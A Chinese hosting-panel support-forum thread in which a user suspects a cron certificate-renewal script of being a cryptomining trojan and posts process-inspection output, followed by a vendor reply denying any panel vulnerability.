【已解答】宝塔BUG。被挂马
为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:最新版11.4.* 挂马以后一直执行挖矿程序
系统版本:
ubuntu 22.4
问题描述:
会在/www/server/cron
建立随机脚本 32位随机字符伪装成证书续订脚本的挖矿木马
/www/server/cron/3ab48c27ec99cb9787749c362afae517并生成对应的log
/www/server/cron/3ab48c27ec99cb9787749c362afae517.log
/www/server/cron/3ab48c27ec99cb9787749c362afae517脚本内容:#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
echo $$ > /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
/www/server/panel/pyenv/bin/python3 -u /www/server/panel/class/acme_v2.py --renew_v2=1
echo "----------------------------------------------------------------------------"
endDate=`date +"%Y-%m-%d %H:%M:%S"`
echo "★[$endDate] Successful"
echo "----------------------------------------------------------------------------"
if [[ "$1" != "start" ]]; then
btpython /www/server/panel/script/log_task_analyzer.py /www/server/cron/3ab48c27ec99cb9787749c362afae517.log
fi
rm -f /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
执行查看CPU
================================================
进程资源监控与管理工具
================================================
正在分析系统资源占用情况...
CPU和内存占用TOP进程列表(CPU核心数: 8):
[编号] PID 用户 单核CPU% 总CPU% 内存% 实际内存 命令
--------------------------------------------------------------------------------------------------------------------
639664 root 12.4 99.3 0.0 1MB bash
会出现很多bash的进程 占用所有核心。而且还留20%空余。。。。
更多分析内容
root@myubuntu:~# ls -l /proc/639664/exe
lrwxrwxrwx 1 root root 0 Jan 23 18:31 /proc/639664/exe -> /bin/bash
root@myubuntu:~# cat /proc/639664/cmdline | tr '\0' ' '; echo
bash
root@myubuntu:~# ls -l /proc/639664/cwd
lrwxrwxrwx 1 root root 0 Jan 23 18:38 /proc/639664/cwd -> /
root@myubuntu:~# ps -o pid,ppid,cmd -p 639664
PID PPID CMD
639664638802 bash
root@myubuntu:~# lsof -p 639664
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 639664 rootcwd DIR 0,45 4096 3801182 /
bash 639664 rootrtd DIR 0,45 4096 3801182 /
bash 639664 roottxt REG 0,45 789472 3820483 /bin/bash
bash 639664 rootmem REG 0,45 3821089 /usr/lib/libncursesw.so.6.6 (stat: No such file or directory)
bash 639664 rootmem REG 0,45 3821107 /usr/lib/libreadline.so.8.3 (stat: No such file or directory)
bash 639664 rootmem REG 0,45 3819533 /lib/ld-musl-x86_64.so.1 (stat: No such file or directory)
bash 639664 root 0rFIFO 0,14 0t0 2820353 pipe
bash 639664 root 1u CHR136,0 0t0 3 /dev/pts/0
bash 639664 root 2u CHR136,0 0t0 3 /dev/pts/0
root@myubuntu:~# ss -tunlp | grep 639664
root@myubuntu:~# cat /proc/639664/environ | tr '\0' '\n' | grep -iE 'host|url|ip|port'
HOSTNAME=20ece9245879
WEBUI_PORT=8081
PS1=$(whoami)@$(hostname):$(pwd)\$
TORRENTING_PORT=6881
root@myubuntu:~# cp -r /proc/639664/cwd /tmp/suspect_bash_cwd_ $ (date +%s)
bash: syntax error near unexpected token `('
root@myubuntu:~# cat /proc/639664/cmdline | tr '\0' ' ' > /tmp/cmdline_639664.txt
root@myubuntu:~# ps -p 638802 -o cmd=
bash
root@myubuntu:~# crontab -l
LANG=en_US.UTF-8
LC_ALL=en_US.UTF-8
46 7 * * */www/server/cron/3ab48c27ec99cb9787749c362afae517 >> /www/server/cron/3ab48c27ec99cb9787749c362afae517.log 2>&1
root@myubuntu:~# cat /etc/cron.d/*
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
# The first element of the path is a directory where the debian-sa1
# script is located
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
# Activity reports every 10 minutes everyday
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
# Additional run at 23:59 to rotate the statistics file
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
root@myubuntu:~# lsattr /var/spool/cron
--------------e------- /var/spool/cron/crontabs
--------------e------- /var/spool/cron/atjobs
--------------e------- /var/spool/cron/atspool
root@myubuntu:~# ls /etc/rc.d/init.d/
ls: cannot access '/etc/rc.d/init.d/': No such file or directory
root@myubuntu:~#
相关截图(日志、错误):
log内容:
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 2 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 2 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 3 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 3 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
|-正在续签第 3 张证书,共 3 张..
|-【d3b318dac9c02e84dc257aaae5b25fee】未到续签时间,下次续签:2026-03-23
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 3 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 3 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
|-正在续签第 3 张证书,共 3 张..
|-【d3b318dac9c02e84dc257aaae5b25fee】未到续签时间,下次续签:2026-03-23
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
没人管吗
没人管吗
面板并未收到有漏洞,我司一贯高度重视安全问题,我们在之前就已在补天平台(https://www.butian.net/Company/60392)充值10万元,作为漏洞报告激励
如需安全运维服务,可以联系我司安全运维客户经理
可以协助进行排查
页:
[1]